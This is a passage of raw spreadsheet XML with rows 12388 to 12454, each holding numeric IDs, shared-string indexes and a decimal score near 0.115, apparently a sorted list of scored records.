    </row>
    <row r="12388" ht="15.75" customHeight="1">
      <c r="A12388" s="1">
        <v>25284.0</v>
      </c>
      <c r="B12388" s="2">
        <v>1.3398597E7</v>
      </c>
      <c r="C12388" s="2" t="s">
        <v>11905</v>
      </c>
      <c r="D12388" s="2">
        <v>1.0</v>
      </c>
      <c r="E12388" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12388" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12389" ht="15.75" customHeight="1">
      <c r="A12389" s="1">
        <v>25345.0</v>
      </c>
      <c r="B12389" s="2">
        <v>1.3544849E7</v>
      </c>
      <c r="C12389" s="2" t="s">
        <v>11906</v>
      </c>
      <c r="D12389" s="2">
        <v>1.0</v>
      </c>
      <c r="E12389" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12389" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12390" ht="15.75" customHeight="1">
      <c r="A12390" s="1">
        <v>26332.0</v>
      </c>
      <c r="B12390" s="2">
        <v>1.6720138E7</v>
      </c>
      <c r="C12390" s="2" t="s">
        <v>11907</v>
      </c>
      <c r="D12390" s="2">
        <v>1.0</v>
      </c>
      <c r="E12390" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12390" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12391" ht="15.75" customHeight="1">
      <c r="A12391" s="1">
        <v>28922.0</v>
      </c>
      <c r="B12391" s="2">
        <v>2.9524788E7</v>
      </c>
      <c r="C12391" s="2" t="s">
        <v>11908</v>
      </c>
      <c r="D12391" s="2">
        <v>1.0</v>
      </c>
      <c r="E12391" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12391" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12392" ht="15.75" customHeight="1">
      <c r="A12392" s="1">
        <v>29023.0</v>
      </c>
      <c r="B12392" s="2">
        <v>3.0100945E7</v>
      </c>
      <c r="C12392" s="2" t="s">
        <v>11909</v>
      </c>
      <c r="D12392" s="2">
        <v>1.0</v>
      </c>
      <c r="E12392" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12392" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12393" ht="15.75" customHeight="1">
      <c r="A12393" s="1">
        <v>29148.0</v>
      </c>
      <c r="B12393" s="2">
        <v>3.0589322E7</v>
      </c>
      <c r="C12393" s="2" t="s">
        <v>11910</v>
      </c>
      <c r="D12393" s="2">
        <v>1.0</v>
      </c>
      <c r="E12393" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12393" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12394" ht="15.75" customHeight="1">
      <c r="A12394" s="1">
        <v>29436.0</v>
      </c>
      <c r="B12394" s="2">
        <v>3.2219188E7</v>
      </c>
      <c r="C12394" s="2" t="s">
        <v>11911</v>
      </c>
      <c r="D12394" s="2">
        <v>1.0</v>
      </c>
      <c r="E12394" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12394" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12395" ht="15.75" customHeight="1">
      <c r="A12395" s="1">
        <v>31320.0</v>
      </c>
      <c r="B12395" s="2">
        <v>4.9736152E7</v>
      </c>
      <c r="C12395" s="2" t="s">
        <v>11912</v>
      </c>
      <c r="D12395" s="2">
        <v>1.0</v>
      </c>
      <c r="E12395" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12395" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="12396" ht="15.75" customHeight="1">
      <c r="A12396" s="1">
        <v>1822.0</v>
      </c>
      <c r="B12396" s="2">
        <v>2.9279336E7</v>
      </c>
      <c r="C12396" s="2" t="s">
        <v>11913</v>
      </c>
      <c r="D12396" s="2">
        <v>1.0</v>
      </c>
      <c r="E12396" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12396" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="12397" ht="15.75" customHeight="1">
      <c r="A12397" s="1">
        <v>5211.0</v>
      </c>
      <c r="B12397" s="2">
        <v>4.4939523E7</v>
      </c>
      <c r="C12397" s="2" t="s">
        <v>11914</v>
      </c>
      <c r="D12397" s="2">
        <v>1.0</v>
      </c>
      <c r="E12397" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12397" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="12398" ht="15.75" customHeight="1">
      <c r="A12398" s="1">
        <v>6627.0</v>
      </c>
      <c r="B12398" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C12398" s="2" t="s">
        <v>11915</v>
      </c>
      <c r="D12398" s="2">
        <v>1.0</v>
      </c>
      <c r="E12398" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12398" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="12399" ht="15.75" customHeight="1">
      <c r="A12399" s="1">
        <v>13592.0</v>
      </c>
      <c r="B12399" s="2">
        <v>3.5765737E7</v>
      </c>
      <c r="C12399" s="2" t="s">
        <v>11916</v>
      </c>
      <c r="D12399" s="2">
        <v>1.0</v>
      </c>
      <c r="E12399" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12399" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="12400" ht="15.75" customHeight="1">
      <c r="A12400" s="1">
        <v>19988.0</v>
      </c>
      <c r="B12400" s="2">
        <v>5.7630293E7</v>
      </c>
      <c r="C12400" s="2" t="s">
        <v>11917</v>
      </c>
      <c r="D12400" s="2">
        <v>1.0</v>
      </c>
      <c r="E12400" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12400" s="2">
        <v>0.1161616161616162</v>
      </c>
    </row>
    <row r="12401" ht="15.75" customHeight="1">
      <c r="A12401" s="1">
        <v>5750.0</v>
      </c>
      <c r="B12401" s="2">
        <v>4.6644912E7</v>
      </c>
      <c r="C12401" s="2" t="s">
        <v>11918</v>
      </c>
      <c r="D12401" s="2">
        <v>1.0</v>
      </c>
      <c r="E12401" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12401" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="12402" ht="15.75" customHeight="1">
      <c r="A12402" s="1">
        <v>9102.0</v>
      </c>
      <c r="B12402" s="2">
        <v>5.5163873E7</v>
      </c>
      <c r="C12402" s="2" t="s">
        <v>11919</v>
      </c>
      <c r="D12402" s="2">
        <v>1.0</v>
      </c>
      <c r="E12402" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12402" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="12403" ht="15.75" customHeight="1">
      <c r="A12403" s="1">
        <v>16243.0</v>
      </c>
      <c r="B12403" s="2">
        <v>4.5771669E7</v>
      </c>
      <c r="C12403" s="2" t="s">
        <v>11920</v>
      </c>
      <c r="D12403" s="2">
        <v>1.0</v>
      </c>
      <c r="E12403" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12403" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="12404" ht="15.75" customHeight="1">
      <c r="A12404" s="1">
        <v>24313.0</v>
      </c>
      <c r="B12404" s="2">
        <v>1.0602383E7</v>
      </c>
      <c r="C12404" s="2" t="s">
        <v>11921</v>
      </c>
      <c r="D12404" s="2">
        <v>1.0</v>
      </c>
      <c r="E12404" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12404" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="12405" ht="15.75" customHeight="1">
      <c r="A12405" s="1">
        <v>3841.0</v>
      </c>
      <c r="B12405" s="2">
        <v>4.0209917E7</v>
      </c>
      <c r="C12405" s="2" t="s">
        <v>11922</v>
      </c>
      <c r="D12405" s="2">
        <v>1.0</v>
      </c>
      <c r="E12405" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12405" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="12406" ht="15.75" customHeight="1">
      <c r="A12406" s="1">
        <v>13804.0</v>
      </c>
      <c r="B12406" s="2">
        <v>3.6654924E7</v>
      </c>
      <c r="C12406" s="2" t="s">
        <v>11923</v>
      </c>
      <c r="D12406" s="2">
        <v>1.0</v>
      </c>
      <c r="E12406" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12406" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="12407" ht="15.75" customHeight="1">
      <c r="A12407" s="1">
        <v>16575.0</v>
      </c>
      <c r="B12407" s="2">
        <v>4.690673E7</v>
      </c>
      <c r="C12407" s="2" t="s">
        <v>11924</v>
      </c>
      <c r="D12407" s="2">
        <v>1.0</v>
      </c>
      <c r="E12407" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12407" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="12408" ht="15.75" customHeight="1">
      <c r="A12408" s="1">
        <v>7007.0</v>
      </c>
      <c r="B12408" s="2">
        <v>5.0089912E7</v>
      </c>
      <c r="C12408" s="2" t="s">
        <v>11925</v>
      </c>
      <c r="D12408" s="2">
        <v>1.0</v>
      </c>
      <c r="E12408" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12408" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="12409" ht="15.75" customHeight="1">
      <c r="A12409" s="1">
        <v>29698.0</v>
      </c>
      <c r="B12409" s="2">
        <v>3.4329322E7</v>
      </c>
      <c r="C12409" s="2" t="s">
        <v>11926</v>
      </c>
      <c r="D12409" s="2">
        <v>1.0</v>
      </c>
      <c r="E12409" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12409" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="12410" ht="15.75" customHeight="1">
      <c r="A12410" s="1">
        <v>6003.0</v>
      </c>
      <c r="B12410" s="2">
        <v>4.7469722E7</v>
      </c>
      <c r="C12410" s="2" t="s">
        <v>11927</v>
      </c>
      <c r="D12410" s="2">
        <v>1.0</v>
      </c>
      <c r="E12410" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12410" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="12411" ht="15.75" customHeight="1">
      <c r="A12411" s="1">
        <v>8593.0</v>
      </c>
      <c r="B12411" s="2">
        <v>5.4245181E7</v>
      </c>
      <c r="C12411" s="2" t="s">
        <v>11928</v>
      </c>
      <c r="D12411" s="2">
        <v>1.0</v>
      </c>
      <c r="E12411" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12411" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="12412" ht="15.75" customHeight="1">
      <c r="A12412" s="1">
        <v>18946.0</v>
      </c>
      <c r="B12412" s="2">
        <v>5.4345333E7</v>
      </c>
      <c r="C12412" s="2" t="s">
        <v>11929</v>
      </c>
      <c r="D12412" s="2">
        <v>1.0</v>
      </c>
      <c r="E12412" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12412" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="12413" ht="15.75" customHeight="1">
      <c r="A12413" s="1">
        <v>26088.0</v>
      </c>
      <c r="B12413" s="2">
        <v>1.5657866E7</v>
      </c>
      <c r="C12413" s="2" t="s">
        <v>11930</v>
      </c>
      <c r="D12413" s="2">
        <v>1.0</v>
      </c>
      <c r="E12413" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12413" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="12414" ht="15.75" customHeight="1">
      <c r="A12414" s="1">
        <v>2634.0</v>
      </c>
      <c r="B12414" s="2">
        <v>3.4594757E7</v>
      </c>
      <c r="C12414" s="2" t="s">
        <v>11931</v>
      </c>
      <c r="D12414" s="2">
        <v>1.0</v>
      </c>
      <c r="E12414" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12414" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="12415" ht="15.75" customHeight="1">
      <c r="A12415" s="1">
        <v>8159.0</v>
      </c>
      <c r="B12415" s="2">
        <v>5.3199056E7</v>
      </c>
      <c r="C12415" s="2" t="s">
        <v>11932</v>
      </c>
      <c r="D12415" s="2">
        <v>1.0</v>
      </c>
      <c r="E12415" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12415" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="12416" ht="15.75" customHeight="1">
      <c r="A12416" s="1">
        <v>8267.0</v>
      </c>
      <c r="B12416" s="2">
        <v>5.3430294E7</v>
      </c>
      <c r="C12416" s="2" t="s">
        <v>11933</v>
      </c>
      <c r="D12416" s="2">
        <v>1.0</v>
      </c>
      <c r="E12416" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12416" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="12417" ht="15.75" customHeight="1">
      <c r="A12417" s="1">
        <v>19521.0</v>
      </c>
      <c r="B12417" s="2">
        <v>5.5957902E7</v>
      </c>
      <c r="C12417" s="2" t="s">
        <v>11934</v>
      </c>
      <c r="D12417" s="2">
        <v>1.0</v>
      </c>
      <c r="E12417" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12417" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="12418" ht="15.75" customHeight="1">
      <c r="A12418" s="1">
        <v>1320.0</v>
      </c>
      <c r="B12418" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C12418" s="2" t="s">
        <v>11935</v>
      </c>
      <c r="D12418" s="2">
        <v>1.0</v>
      </c>
      <c r="E12418" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12418" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12419" ht="15.75" customHeight="1">
      <c r="A12419" s="1">
        <v>1397.0</v>
      </c>
      <c r="B12419" s="2">
        <v>2.6274108E7</v>
      </c>
      <c r="C12419" s="2" t="s">
        <v>11936</v>
      </c>
      <c r="D12419" s="2">
        <v>1.0</v>
      </c>
      <c r="E12419" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12419" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12420" ht="15.75" customHeight="1">
      <c r="A12420" s="1">
        <v>1958.0</v>
      </c>
      <c r="B12420" s="2">
        <v>3.0294072E7</v>
      </c>
      <c r="C12420" s="2" t="s">
        <v>11937</v>
      </c>
      <c r="D12420" s="2">
        <v>1.0</v>
      </c>
      <c r="E12420" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12420" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12421" ht="15.75" customHeight="1">
      <c r="A12421" s="1">
        <v>2517.0</v>
      </c>
      <c r="B12421" s="2">
        <v>3.4001642E7</v>
      </c>
      <c r="C12421" s="2" t="s">
        <v>11938</v>
      </c>
      <c r="D12421" s="2">
        <v>1.0</v>
      </c>
      <c r="E12421" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12421" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12422" ht="15.75" customHeight="1">
      <c r="A12422" s="1">
        <v>4294.0</v>
      </c>
      <c r="B12422" s="2">
        <v>4.1913767E7</v>
      </c>
      <c r="C12422" s="2" t="s">
        <v>11939</v>
      </c>
      <c r="D12422" s="2">
        <v>1.0</v>
      </c>
      <c r="E12422" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12422" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12423" ht="15.75" customHeight="1">
      <c r="A12423" s="1">
        <v>4351.0</v>
      </c>
      <c r="B12423" s="2">
        <v>4.2085604E7</v>
      </c>
      <c r="C12423" s="2" t="s">
        <v>11820</v>
      </c>
      <c r="D12423" s="2">
        <v>1.0</v>
      </c>
      <c r="E12423" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12423" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12424" ht="15.75" customHeight="1">
      <c r="A12424" s="1">
        <v>5688.0</v>
      </c>
      <c r="B12424" s="2">
        <v>4.643114E7</v>
      </c>
      <c r="C12424" s="2" t="s">
        <v>11940</v>
      </c>
      <c r="D12424" s="2">
        <v>1.0</v>
      </c>
      <c r="E12424" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12424" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12425" ht="15.75" customHeight="1">
      <c r="A12425" s="1">
        <v>7710.0</v>
      </c>
      <c r="B12425" s="2">
        <v>5.2002053E7</v>
      </c>
      <c r="C12425" s="2" t="s">
        <v>11941</v>
      </c>
      <c r="D12425" s="2">
        <v>1.0</v>
      </c>
      <c r="E12425" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12425" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12426" ht="15.75" customHeight="1">
      <c r="A12426" s="1">
        <v>8515.0</v>
      </c>
      <c r="B12426" s="2">
        <v>5.4067421E7</v>
      </c>
      <c r="C12426" s="2" t="s">
        <v>11942</v>
      </c>
      <c r="D12426" s="2">
        <v>1.0</v>
      </c>
      <c r="E12426" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12426" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12427" ht="15.75" customHeight="1">
      <c r="A12427" s="1">
        <v>15334.0</v>
      </c>
      <c r="B12427" s="2">
        <v>4.257477E7</v>
      </c>
      <c r="C12427" s="2" t="s">
        <v>11943</v>
      </c>
      <c r="D12427" s="2">
        <v>1.0</v>
      </c>
      <c r="E12427" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12427" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12428" ht="15.75" customHeight="1">
      <c r="A12428" s="1">
        <v>15484.0</v>
      </c>
      <c r="B12428" s="2">
        <v>4.3179936E7</v>
      </c>
      <c r="C12428" s="2" t="s">
        <v>11944</v>
      </c>
      <c r="D12428" s="2">
        <v>1.0</v>
      </c>
      <c r="E12428" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12428" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12429" ht="15.75" customHeight="1">
      <c r="A12429" s="1">
        <v>18239.0</v>
      </c>
      <c r="B12429" s="2">
        <v>5.2140068E7</v>
      </c>
      <c r="C12429" s="2" t="s">
        <v>11945</v>
      </c>
      <c r="D12429" s="2">
        <v>1.0</v>
      </c>
      <c r="E12429" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12429" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12430" ht="15.75" customHeight="1">
      <c r="A12430" s="1">
        <v>24238.0</v>
      </c>
      <c r="B12430" s="2">
        <v>1.0473103E7</v>
      </c>
      <c r="C12430" s="2" t="s">
        <v>11946</v>
      </c>
      <c r="D12430" s="2">
        <v>1.0</v>
      </c>
      <c r="E12430" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12430" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12431" ht="15.75" customHeight="1">
      <c r="A12431" s="1">
        <v>24674.0</v>
      </c>
      <c r="B12431" s="2">
        <v>1.1583741E7</v>
      </c>
      <c r="C12431" s="2" t="s">
        <v>11947</v>
      </c>
      <c r="D12431" s="2">
        <v>1.0</v>
      </c>
      <c r="E12431" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12431" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12432" ht="15.75" customHeight="1">
      <c r="A12432" s="1">
        <v>24796.0</v>
      </c>
      <c r="B12432" s="2">
        <v>1.1992965E7</v>
      </c>
      <c r="C12432" s="2" t="s">
        <v>11948</v>
      </c>
      <c r="D12432" s="2">
        <v>1.0</v>
      </c>
      <c r="E12432" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12432" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12433" ht="15.75" customHeight="1">
      <c r="A12433" s="1">
        <v>28662.0</v>
      </c>
      <c r="B12433" s="2">
        <v>2.7417014E7</v>
      </c>
      <c r="C12433" s="2" t="s">
        <v>11949</v>
      </c>
      <c r="D12433" s="2">
        <v>1.0</v>
      </c>
      <c r="E12433" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12433" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12434" ht="15.75" customHeight="1">
      <c r="A12434" s="1">
        <v>30568.0</v>
      </c>
      <c r="B12434" s="2">
        <v>4.0958475E7</v>
      </c>
      <c r="C12434" s="2" t="s">
        <v>11950</v>
      </c>
      <c r="D12434" s="2">
        <v>1.0</v>
      </c>
      <c r="E12434" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12434" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12435" ht="15.75" customHeight="1">
      <c r="A12435" s="1">
        <v>30759.0</v>
      </c>
      <c r="B12435" s="2">
        <v>4.4291542E7</v>
      </c>
      <c r="C12435" s="2" t="s">
        <v>11951</v>
      </c>
      <c r="D12435" s="2">
        <v>1.0</v>
      </c>
      <c r="E12435" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12435" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12436" ht="15.75" customHeight="1">
      <c r="A12436" s="1">
        <v>31978.0</v>
      </c>
      <c r="B12436" s="2">
        <v>5319104.0</v>
      </c>
      <c r="C12436" s="2" t="s">
        <v>11952</v>
      </c>
      <c r="D12436" s="2">
        <v>1.0</v>
      </c>
      <c r="E12436" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12436" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12437" ht="15.75" customHeight="1">
      <c r="A12437" s="1">
        <v>32492.0</v>
      </c>
      <c r="B12437" s="2">
        <v>5700919.0</v>
      </c>
      <c r="C12437" s="2" t="s">
        <v>11953</v>
      </c>
      <c r="D12437" s="2">
        <v>1.0</v>
      </c>
      <c r="E12437" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12437" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="12438" ht="15.75" customHeight="1">
      <c r="A12438" s="1">
        <v>391.0</v>
      </c>
      <c r="B12438" s="2">
        <v>1.6482333E7</v>
      </c>
      <c r="C12438" s="2" t="s">
        <v>11954</v>
      </c>
      <c r="D12438" s="2">
        <v>1.0</v>
      </c>
      <c r="E12438" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12438" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="12439" ht="15.75" customHeight="1">
      <c r="A12439" s="1">
        <v>2051.0</v>
      </c>
      <c r="B12439" s="2">
        <v>3.0938991E7</v>
      </c>
      <c r="C12439" s="2" t="s">
        <v>11955</v>
      </c>
      <c r="D12439" s="2">
        <v>1.0</v>
      </c>
      <c r="E12439" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12439" s="2">
        <v>0.1155202821869489</v>
      </c>
    </row>
    <row r="12440" ht="15.75" customHeight="1">
      <c r="A12440" s="1">
        <v>6885.0</v>
      </c>
      <c r="B12440" s="2">
        <v>4.9754567E7</v>
      </c>
      <c r="C12440" s="2" t="s">
        <v>11956</v>
      </c>
      <c r="D12440" s="2">
        <v>1.0</v>
      </c>
      <c r="E12440" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12440" s="2">
        <v>0.1153846153846154</v>
      </c>
    </row>
    <row r="12441" ht="15.75" customHeight="1">
      <c r="A12441" s="1">
        <v>1343.0</v>
      </c>
      <c r="B12441" s="2">
        <v>2.5890034E7</v>
      </c>
      <c r="C12441" s="2" t="s">
        <v>11957</v>
      </c>
      <c r="D12441" s="2">
        <v>1.0</v>
      </c>
      <c r="E12441" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12441" s="2">
        <v>0.115257048092869</v>
      </c>
    </row>
    <row r="12442" ht="15.75" customHeight="1">
      <c r="A12442" s="1">
        <v>8008.0</v>
      </c>
      <c r="B12442" s="2">
        <v>5.2784878E7</v>
      </c>
      <c r="C12442" s="2" t="s">
        <v>11958</v>
      </c>
      <c r="D12442" s="2">
        <v>1.0</v>
      </c>
      <c r="E12442" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12442" s="2">
        <v>0.1151960784313726</v>
      </c>
    </row>
    <row r="12443" ht="15.75" customHeight="1">
      <c r="A12443" s="1">
        <v>8791.0</v>
      </c>
      <c r="B12443" s="2">
        <v>5.4596527E7</v>
      </c>
      <c r="C12443" s="2" t="s">
        <v>11959</v>
      </c>
      <c r="D12443" s="2">
        <v>1.0</v>
      </c>
      <c r="E12443" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12443" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="12444" ht="15.75" customHeight="1">
      <c r="A12444" s="1">
        <v>4025.0</v>
      </c>
      <c r="B12444" s="2">
        <v>4.0974033E7</v>
      </c>
      <c r="C12444" s="2" t="s">
        <v>11960</v>
      </c>
      <c r="D12444" s="2">
        <v>1.0</v>
      </c>
      <c r="E12444" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12444" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12445" ht="15.75" customHeight="1">
      <c r="A12445" s="1">
        <v>4795.0</v>
      </c>
      <c r="B12445" s="2">
        <v>4.3503827E7</v>
      </c>
      <c r="C12445" s="2" t="s">
        <v>11961</v>
      </c>
      <c r="D12445" s="2">
        <v>1.0</v>
      </c>
      <c r="E12445" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12445" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12446" ht="15.75" customHeight="1">
      <c r="A12446" s="1">
        <v>6468.0</v>
      </c>
      <c r="B12446" s="2">
        <v>4.8638932E7</v>
      </c>
      <c r="C12446" s="2" t="s">
        <v>11962</v>
      </c>
      <c r="D12446" s="2">
        <v>1.0</v>
      </c>
      <c r="E12446" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12446" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12447" ht="15.75" customHeight="1">
      <c r="A12447" s="1">
        <v>7567.0</v>
      </c>
      <c r="B12447" s="2">
        <v>5.1557866E7</v>
      </c>
      <c r="C12447" s="2" t="s">
        <v>11963</v>
      </c>
      <c r="D12447" s="2">
        <v>1.0</v>
      </c>
      <c r="E12447" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12447" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12448" ht="15.75" customHeight="1">
      <c r="A12448" s="1">
        <v>8119.0</v>
      </c>
      <c r="B12448" s="2">
        <v>5.3080065E7</v>
      </c>
      <c r="C12448" s="2" t="s">
        <v>11964</v>
      </c>
      <c r="D12448" s="2">
        <v>1.0</v>
      </c>
      <c r="E12448" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12448" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12449" ht="15.75" customHeight="1">
      <c r="A12449" s="1">
        <v>14370.0</v>
      </c>
      <c r="B12449" s="2">
        <v>3.8974295E7</v>
      </c>
      <c r="C12449" s="2" t="s">
        <v>11965</v>
      </c>
      <c r="D12449" s="2">
        <v>1.0</v>
      </c>
      <c r="E12449" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12449" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12450" ht="15.75" customHeight="1">
      <c r="A12450" s="1">
        <v>15783.0</v>
      </c>
      <c r="B12450" s="2">
        <v>4.4199813E7</v>
      </c>
      <c r="C12450" s="2" t="s">
        <v>11966</v>
      </c>
      <c r="D12450" s="2">
        <v>1.0</v>
      </c>
      <c r="E12450" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12450" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="12451" ht="15.75" customHeight="1">
      <c r="A12451" s="1">
        <v>675.0</v>
      </c>
      <c r="B12451" s="2">
        <v>2.0255194E7</v>
      </c>
      <c r="C12451" s="2" t="s">
        <v>11967</v>
      </c>
      <c r="D12451" s="2">
        <v>1.0</v>
      </c>
      <c r="E12451" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12451" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12452" ht="15.75" customHeight="1">
      <c r="A12452" s="1">
        <v>1278.0</v>
      </c>
      <c r="B12452" s="2">
        <v>2.548953E7</v>
      </c>
      <c r="C12452" s="2" t="s">
        <v>11968</v>
      </c>
      <c r="D12452" s="2">
        <v>1.0</v>
      </c>
      <c r="E12452" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12452" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12453" ht="15.75" customHeight="1">
      <c r="A12453" s="1">
        <v>1663.0</v>
      </c>
      <c r="B12453" s="2">
        <v>2.8184155E7</v>
      </c>
      <c r="C12453" s="2" t="s">
        <v>11969</v>
      </c>
      <c r="D12453" s="2">
        <v>1.0</v>
      </c>
      <c r="E12453" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12453" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
    <row r="12454" ht="15.75" customHeight="1">
      <c r="A12454" s="1">
        <v>2122.0</v>
      </c>
      <c r="B12454" s="2">
        <v>3.139152E7</v>
      </c>
      <c r="C12454" s="2" t="s">
        <v>11970</v>
      </c>
      <c r="D12454" s="2">
        <v>1.0</v>
      </c>
      <c r="E12454" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12454" s="2">
        <v>0.1141975308641975</v>
      </c>
    </row>
